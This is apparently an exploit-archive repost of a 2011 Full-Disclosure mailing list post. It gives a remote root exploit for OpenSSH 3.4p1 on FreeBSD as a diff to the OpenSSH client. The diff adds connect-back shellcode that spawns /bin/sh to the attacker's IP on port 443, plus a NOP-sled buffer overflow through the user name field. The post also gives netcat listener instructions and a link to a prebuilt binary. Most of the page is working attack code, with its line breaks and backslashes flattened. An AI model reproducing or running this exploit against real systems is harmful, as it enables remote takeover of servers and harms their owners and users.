Home / exploits OpenSSH 3.4p1 FreeBSD Remote Root Exploit
Posted on 01 July 2011
OpenSSH FreeBSD Remote Root Exploit By Kingcope Year 2011 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 run like ./ssh -1 -z <yourip> <target> setup a netcat, port 443 on yourip first a statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day I know these versions are really old, some seem to run that tough. -Cheers, King "the archaeologist" Cope diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c 149a150 > char *myip; 195a197,203 > "OpenSSH FreeBSD Remote Root Exploit " > "By Kingcope " > "Year 2011 " > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 " > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 " > "run like ./ssh -1 -z <yourip> <target> " > "setup a netcat, port 443 on yourip first " 299c307 < while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx" --- > while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx" 335a344,346 > break; > case 'z': > myip = optarg; diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c 667a668,719 > //IP=xc0xa8x20x80 > #define IPADDR "xc0xa8x20x80" > #define PORT "x27x10" /* htons(10000) */ > > char sc[] = > "x90x90" > "x90x90" > "x31xc9" // xor ecx, ecx > "xf7xe1" // mul ecx > "x51" // push ecx > "x41" // inc ecx > "x51" // push ecx > "x41" // inc ecx > "x51" // push ecx > "x51" // push ecx > "xb0x61" // mov al, 97 > "xcdx80" // int 80h > "x89xc3" // mov ebx, eax > "x68"IPADDR // push dword 0101017fh > "x66x68"PORT // push word 4135 > "x66x51" // push cx > "x89xe6" // mov esi, esp > "xb2x10" // mov dl, 16 > "x52" // push edx > "x56" // push esi > "x50" // push eax > "x50" // push eax > "xb0x62" // mov al, 98 > "xcdx80" // int 80h > "x41" // inc ecx > "xb0x5a" // mov al, 90 > "x49" // dec ecx > "x51" // push ecx > "x53" // push ebx > "x53" // push ebx > "xcdx80" // int 80h > "x41" // inc ecx > "xe2xf5" // loop -10 > "x51" // push ecx > "x68x2fx2fx73x68" // push dword 68732f2fh > "x68x2fx62x69x6e" // push dword 6e69622fh > "x89xe3" // mov ebx, esp > "x51" // push ecx > "x54" // push esp > "x53" // push ebx > "x53" // push ebx > "xb0xc4x34xff" > "xcdx80"; // int 80h > > > extern char *myip; > 678a731,748 > > char buffer[100000]; > > printf("OpenSSH Remote Root Exploit "); > printf("By Kingcope "); > printf("Year 2011 "); > printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 "); > printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 "); > printf("Connect back to: %s:443 ", myip); > > *((unsigned long*)(sc + 21)) = inet_addr(myip); > *((unsigned short*)(sc + 27)) = htons(443); > > memset(buffer, 'V', 8096); > memcpy(buffer+24, "x6bx4bx0cx08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 > memset(buffer+28, 'x90', 65535); > memcpy(buffer+28+65535, sc, sizeof(sc)); > server_user=buffer; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
